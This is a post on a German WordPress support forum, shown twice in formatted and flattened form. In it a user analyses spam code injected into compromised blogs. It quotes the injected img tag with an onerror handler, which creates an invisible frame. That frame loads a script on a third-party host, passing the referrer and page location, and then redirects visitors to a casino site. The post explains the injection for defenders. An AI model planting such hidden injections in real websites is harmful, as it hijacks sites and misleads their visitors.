WordPress Deutschland Forum - Einzelnen Beitrag anzeigen - Gemeinsamkeiten zwischen geknackten WP-Blogs

Webrocker · 25.03.2008, 18:19

HTML-Code:

<img src="xcdffg" onerror="r('www geant casino fr', '1','2');"/>

damit wird ein nichtexistentes bild eingebunden, weil es nicht existiert, wird der browser bei eingeschaltetem javascript veranlasst, die funktion

HTML-Code:

onerror="r('www geant casino fr', '1','2');

auszuführen.
Diese erzeugt einen "unsichtbaren" frame, in dem als src eine datei gerufen wird, die

HTML-Code:

http://www.preservesightcolorado.org/feb.php?2
&q=www geant casino fr
&referer=escape(document.referrer);
&1=2
&c=1
&from=escape(document.location)

offenbar anhand von Keyword, Language und Kategorie sowie referrer und location "erkennt", wo das Blog gecrackt wurde und (wahrscheinlich) den eigentlichen Spaminhalt ausgibt.
Wenn man die Datei mit den Parametern aus dem Beispiel von Hand füttert, erfolgt ein redirect auf http www 888 com (link kaputtgemacht

)

25.03.2008, 18:19	#8 (permalink)
Webrocker PostRank: 2 Registriert seit: 30.12.2005 Beiträge: 90	HTML-Code: <img src="xcdffg" onerror="r('www geant casino fr', '1','2');"/> damit wird ein nichtexistentes bild eingebunden, weil es nicht existiert, wird der browser bei eingeschaltetem javascript veranlasst, die funktion HTML-Code: onerror="r('www geant casino fr', '1','2'); auszuführen. Diese erzeugt einen "unsichtbaren" frame, in dem als src eine datei gerufen wird, die HTML-Code: http://www.preservesightcolorado.org/feb.php?2 &q=www geant casino fr &referer=escape(document.referrer); &1=2 &c=1 &from=escape(document.location) offenbar anhand von Keyword, Language und Kategorie sowie referrer und location "erkennt", wo das Blog gecrackt wurde und (wahrscheinlich) den eigentlichen Spaminhalt ausgibt. Wenn man die Datei mit den Parametern aus dem Beispiel von Hand füttert, erfolgt ein redirect auf http www 888 com (link kaputtgemacht ) __________________ http://www.webrocker.de Geändert von Webrocker (25.03.2008 um 18:22 Uhr).